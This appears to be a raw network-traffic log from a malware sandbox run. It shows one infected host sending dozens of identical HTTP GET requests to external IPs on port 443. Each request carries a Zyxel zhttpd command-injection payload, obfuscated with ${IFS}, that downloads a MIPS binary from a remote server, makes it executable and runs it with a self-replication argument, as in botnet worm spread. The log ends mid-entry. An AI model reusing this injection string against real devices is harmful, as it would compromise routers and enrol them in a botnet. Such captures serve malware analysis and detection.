                                                  Jan 19, 2024 18:24:16.477410078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9535192.168.2.1358476135.126.207.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477441072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9536192.168.2.1338578111.35.35.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477484941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9537192.168.2.1348322221.165.140.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477545023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9538192.168.2.134334898.148.35.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477564096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9539192.168.2.1349806101.166.0.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477617025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9540192.168.2.1360216139.48.37.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477649927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9541192.168.2.135951618.13.113.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477679968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9542192.168.2.1344752170.153.215.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477734089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9543192.168.2.1341500147.2.4.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477776051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9544192.168.2.135222441.253.193.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477797031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9545192.168.2.1335770178.137.169.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477844000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9546192.168.2.1360908219.151.248.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477878094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9547192.168.2.1345904183.245.128.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477926016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9548192.168.2.1357678155.239.123.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477969885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9549192.168.2.1360332114.190.196.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478008032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9550192.168.2.133989824.216.104.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478048086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9551192.168.2.1340828102.49.0.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478075981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9552192.168.2.1351134186.148.93.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478122950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9553192.168.2.133593697.146.108.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478158951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9554192.168.2.135054446.53.241.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478188992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9555192.168.2.133805658.180.0.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478226900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9556192.168.2.135013866.117.236.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478260994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9557192.168.2.1353666131.98.35.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478307009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9558192.168.2.135057832.127.98.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478327036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9559192.168.2.1336072110.44.184.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478363037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9560192.168.2.1338592106.94.160.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478405952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9561192.168.2.1353142147.28.62.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478441954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9562192.168.2.1356976139.175.84.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478481054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9563192.168.2.1343552141.51.42.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478533983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9564192.168.2.1360848198.198.116.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478562117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9565192.168.2.135552627.87.87.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478604078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9566192.168.2.1334994111.244.246.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478634119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9567192.168.2.1343414179.216.249.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478667021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9568192.168.2.1353522152.195.23.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478734970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9569192.168.2.1346500141.60.253.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478773117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9570192.168.2.133395859.104.108.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478813887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9571192.168.2.1333082172.74.109.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478852034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9572192.168.2.1350706199.245.144.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478899002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9573192.168.2.1340158175.226.173.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478929043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9574192.168.2.1358826101.128.108.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478952885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9575192.168.2.13351985.195.226.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.478997946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9576192.168.2.1354202108.240.69.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479032993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9577192.168.2.135905845.206.241.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479093075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9578192.168.2.1341872168.69.22.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479127884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9579192.168.2.1349616102.91.190.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479170084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9580192.168.2.1342032186.145.129.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479233027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9581192.168.2.1354322147.148.56.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479270935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9582192.168.2.1335878156.226.195.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479315996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9583192.168.2.1333222118.112.33.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479357004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9584192.168.2.1348826169.5.208.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479402065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9585192.168.2.133451643.13.235.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479432106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9586192.168.2.1356622136.59.28.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479490042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9587192.168.2.1340984195.104.22.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479521990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9588192.168.2.1350182223.14.167.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479571104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9589192.168.2.1336526183.121.149.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479609013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9590192.168.2.1360906194.88.53.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479651928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9591192.168.2.1359638135.170.124.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479682922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9592192.168.2.134984099.39.147.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479716063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9593192.168.2.135699213.143.242.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479773998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9594192.168.2.1340848193.1.59.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479808092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9595192.168.2.135602040.11.254.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479842901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9596192.168.2.134442498.233.127.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.479872942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9597192.168.2.13402209.51.142.15443
                                                  TimestampBytes transferredDirectionData
